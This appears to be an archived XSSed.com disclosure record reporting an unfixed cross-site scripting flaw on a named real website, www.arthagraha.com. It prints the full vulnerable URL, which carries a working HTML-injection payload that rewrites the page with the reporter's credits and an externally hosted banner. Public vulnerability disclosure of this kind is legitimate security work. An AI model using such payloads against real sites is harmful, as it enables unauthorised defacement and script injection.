Unfixed XSS vulnerability at www.arthagraha.com

2009-04-06T00:00:00
ID XSSED:61489
Type xssed
Reporter SPYRO KiD
Modified 2011-12-18T00:00:00

Description

Security researcher SPYRO KiD, has submitted on 04/06/2009 a cross-site-scripting (XSS) vulnerability affecting www.arthagraha.com, which at the time of submission ranked 2666993 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.arthagraha.com/NewsPOP.asp?title=Critical%20Cross%20Site%20Scripting!%3C/title%3E%3C/head%3E%3Cbody%3E%3Ccenter%3E%3Ch1%3EXSSED%3C/h1%3Eby%3Cbr%3E%3Cbr%3E%3Cb%3ESPYRO%20KiD%3Cbr%3Ehttp://spyrozone.net%3Cbr%3E%3Cbr%3E%3Ca%20href=%22http://www.spyrozone.net%22%20target=%22new%22%3E%3Cimg%20border=%220%22%20src=%22http://i-zoners.co.cc/banner_spyrozone/www.spyrozone.net_109x63.gif%22%20alt=%22Enter%20spyroZONE!%20-%20www.spyrozone.net%22%3E%3C/a%3E%3Cnoscript%3E